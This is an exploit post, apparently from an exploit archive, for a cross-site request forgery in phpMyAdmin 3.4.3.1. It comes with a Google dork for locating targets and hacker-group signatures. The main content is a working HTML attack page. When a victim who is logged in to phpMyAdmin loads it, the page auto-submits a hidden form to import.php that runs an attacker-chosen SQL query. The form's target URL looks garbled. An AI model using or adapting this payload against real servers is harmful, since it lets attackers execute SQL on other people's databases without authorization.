# Exploit Title: PhpMyadmin XSRF Vuln (Execute SQL Query)
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/phpmyadmin/
# Category:: Webapps
# Tested on: [Windows Seven Edition Intégral- French]
####
# | >> -------+++=[ Dz Offenders Cr3w ]=+++----- << |
# | Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * ...|
# | ----------------------------------------------- |
# + All Dz .. This is Open Group 4 L33T Dz Hax3rZ ..
####
[+] Note :
Only the request executed by the root,users (Server)
[+] Tested on : EasyPhp 5.4alpha2
-Apache 2.2.19
-MySQL 5.5.13
-PhpMyAdmin 3.4.3.1
-Xdebug 2.1.1
[+] Video:
http://www.youtube.com/watch?v=xJH_ujBNTVY
[*] ExpLo!T :
<html>
<head>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
var count = 1;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<form method="post" action="http://www.2cto.com /home/mysql/import.php" enctype="multipart/form-data" class="ajax" id="sqlqueryform" name="sqlform">
<input type="hidden" name="is_js_confirmed" value="0" />
<input type="hidden" name="token" value="47cd4b47756bd497165c6fc7f87d2182" /> <<== make sure you put the right value
<input type="hidden" name="pos" value="0" />
<input type="hidden" name="goto" value="server_sql.php" />
<input type="hidden" name="message_to_show" value="Votre requête SQL a été exécutée avec succès" />
<input type="hidden" name="prev_sql_query" value="" />
<textarea type="hidden" tabindex="100" name="sql_query" id="sqlquery" cols="40" rows="30" dir="ltr">Your SQL Query;</textarea>
<input type="hidden" name="bkm_label" value="" />
<input type="hidden" name="bkm_all_users" value="true" />
<input type="hidden" name="bkm_replace" value="true" />
<input type="hidden" name="sql_delimiter" value=";" /> ]
<input type="hidden" name="show_query" value="1" checked="checked" />
</form>
####
[+] Peace From Algeria